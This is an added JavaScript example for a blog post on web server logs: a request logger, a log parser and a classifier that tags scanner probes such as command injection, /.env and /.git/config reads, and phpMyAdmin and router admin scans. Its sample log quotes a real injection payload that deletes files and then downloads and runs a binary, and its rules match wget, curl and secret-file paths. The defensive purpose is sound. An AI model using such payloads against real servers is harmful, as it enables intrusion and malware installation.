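As an added example (not code from the original post), here is a logging middleware that writes the same block format the post's log shows, together with a parser and a classifier that tags the probe families walked through above (shell command injection, /.env and /.git/config, the PRI preface, WordPress and phpMyAdmin path scans, router admin forms). Express is not required; `req` is assumed to expose .ip, .method and .originalUrl as Express does, and the rule patterns and the benign sample address 203.0.113.7 are my own construction.

```javascript
// Added example, not code from the original post. An Express-style request
// logger writing the same '-----' block format shown above, plus a parser and
// a classifier that tags the probe families the post walks through. Express is
// not required: `req` only needs .ip, .method and .originalUrl.
const PROBE_RULES = [ // each regex is matched against "METHOD target"
  ['command-injection', /[;|`]|\b(wget|curl|chmod)\b/i],           // /shell?cd+/tmp;rm+-rf+*;wget...
  ['exposed-secret-file', /\/\.(env|git)(\/|\?|$)/],             // /.env, /.git/config
  ['http2-preface', /^PRI \*$/],                                  // HTTP/2 preface hitting HTTP/1.1
  ['wordpress-scan', /wp-includes\/wlwmanifest\.xml|xmlrpc\.php/i],
  ['phpmyadmin-path-scan', /\/index\.php\?lang=en$/i],            // every hit in the post's 1-minute burst
  ['router-admin-probe', /GponForm|boaform\/admin|setup\.cgi/i],  // GPON / Boa / Netgear admin forms
];

// Middleware half: one block per request, same layout as the post's log.
function formatEntry(req, now = new Date()) {
  return ['-----', String(now), req.ip, `${req.method} : ${req.originalUrl}`, '-----'].join('\n');
}
function requestLogger(sink = console.log) {
  return (req, res, next) => { sink(formatEntry(req)); next(); };
}

// Analysis half: read blocks back. IPv4 clients show up as ::ffff:a.b.c.d on a
// dual-stack socket, so that prefix is stripped to group by the real address.
function parseLog(text) {
  const entries = [];
  for (const block of text.split(/^-----$/m)) {
    const lines = block.split('\n').map((l) => l.trim()).filter(Boolean);
    const m = lines.length === 3 && /^(\S+) : (.*)$/.exec(lines[2]);
    if (!m) continue;                                 // gap between blocks, or junk
    entries.push({ time: lines[0], ip: lines[1].replace(/^::ffff:/, ''), method: m[1], target: m[2] });
  }
  return entries;
}

// All matching tags for one entry; an empty array means ordinary traffic.
function classify(entry) {
  const s = `${entry.method} ${entry.target}`;
  return PROBE_RULES.filter(([, re]) => re.test(s)).map(([tag]) => tag);
}

// One row per source address, so a scanner that sends 130 requests in a
// minute (like the phpMyAdmin burst above) collapses into a single line.
function summarize(entries) {
  const byIp = new Map();
  for (const e of entries) {
    const tags = classify(e);
    if (tags.length === 0) continue;
    const row = byIp.get(e.ip) || byIp.set(e.ip, { ip: e.ip, hits: 0, tags: new Set() }).get(e.ip);
    row.hits += 1;
    tags.forEach((t) => row.tags.add(t));
  }
  return [...byIp.values()].map((r) => ({ ...r, tags: [...r.tags].sort() }));
}

// Constructed sample in the post's format: the first three targets are taken
// from the post, the last (203.0.113.7, a documentation address) is benign.
const SAMPLE_LOG = `-----
Wed Feb 16 2022 03:38:39 GMT+0900 (Korean Standard Time)
::ffff:47.111.227.119
GET : /shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws
-----
Wed Feb 16 2022 17:30:18 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpmyadmin2018/index.php?lang=en
-----
Wed Feb 16 2022 17:30:19 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2016/index.php?lang=en
-----
Wed Feb 16 2022 18:00:00 GMT+0900 (Korean Standard Time)
::ffff:203.0.113.7
GET : /posts/1
-----`;
console.table(summarize(parseLog(SAMPLE_LOG)));
```

Running it prints one row per scanning address; requests that match no rule (the /posts/1 view) are dropped from the summary but still appear in the raw log.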